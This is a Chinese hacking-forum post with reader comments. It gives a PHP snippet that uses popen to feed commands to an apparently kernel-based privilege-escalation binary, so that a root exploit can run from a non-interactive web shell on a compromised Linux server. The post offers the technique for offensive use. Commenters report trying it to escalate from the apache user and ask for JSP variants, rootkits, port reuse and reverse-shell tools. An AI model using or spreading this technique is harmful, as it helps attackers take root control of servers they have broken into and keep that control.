PHP 非交互式 执行交互式命令 2013-12-02 23:13:17 55 Cond0r 6322 1 提权转发不出来 只能出此下策 shell可以用except来执行交互命令 python 也有pexcept模块 perl也有except模块 但是默认不安装 咱们还是用牛逼的php吧 我就不解释了 看懂的人自然就懂了 代码<?php $sucommand = "/tmp/2.6.18-2011"; $fp = popen($sucommand ,"w"); @fputs($fp,"echo 22222 > /tmp/sbsbsbsbsbsb11111"); @pclose($fp); ?> 再补一张图 类别 渗透测试 关于作者 Cond0r136篇文章1277篇回复
评论55次
恩,条条大路通罗马。
好东西,不错,支持一个
好办法,mark,有没交互式的。
mark。。。。
没看 明白
很好点思路
收藏一下 感谢
和python的popen一样
看起来很厉害的样子
要是只支持jsp怎么办?私,,,
感谢分享!!
学xi了 方法很好
@anlfi 这个想法难道就是传说中的应用层ROOTKIT?
大牛。 有木有jsp下 执行的? jsp非交互式 执行交互式命令提权
mark.........
这个得收藏啊
测试了下 不知道提权没成功还是怎么 权限还是apache 悲催啊
复用你可以考虑apache的mod之类的~~
他能给你推荐出端口复用的已经很不错了 反弹?有也是最少几万RBM一个。我想想不会掉下5万
。。。就是不知道有神马好用的ROOTKIT。。求推荐。。如果不能反弹,估计多半只能复用了。偶对LINUX搞得少,确实不知道有神马好用的ROOTKIT。